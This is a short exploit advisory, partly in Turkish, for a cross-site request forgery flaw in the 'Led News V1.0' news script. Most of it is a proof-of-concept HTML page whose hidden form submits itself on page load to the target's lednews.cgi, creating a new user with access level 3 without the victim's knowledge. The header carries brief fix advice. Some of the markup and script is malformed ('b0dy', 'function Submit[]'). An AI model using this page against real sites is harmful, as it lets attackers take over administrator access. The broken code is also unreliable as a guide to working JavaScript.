< ------------------- header data start ------------------- >

#############################################################

# Application Name : Led News V1.0

# Vulnerable Type : XSRF

# Infection : Uzaktan otomatik olarak admin pass change edilebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >



<b0dy onLoad=Submit();>
<script>function Submit[]{document.BizaRRo.submit();}</script>

<form method=post action=http://www.site.com/cgi-bin/lednews/lednews.cgi?a=exec_new_user name=BizaRRo >

<input type=hidden name=username size=50 value=Bizo />
<input type=hidden name=password size=50 value=Bizo />
<input type=hidden name=email size=50 value=Bizo />
<select name=access_level ><option value=3>

<input type=image src= http://img56.imageshack.us/img56/6712/kaydetr7c26ki8.gif>




< -- bug code end of -- >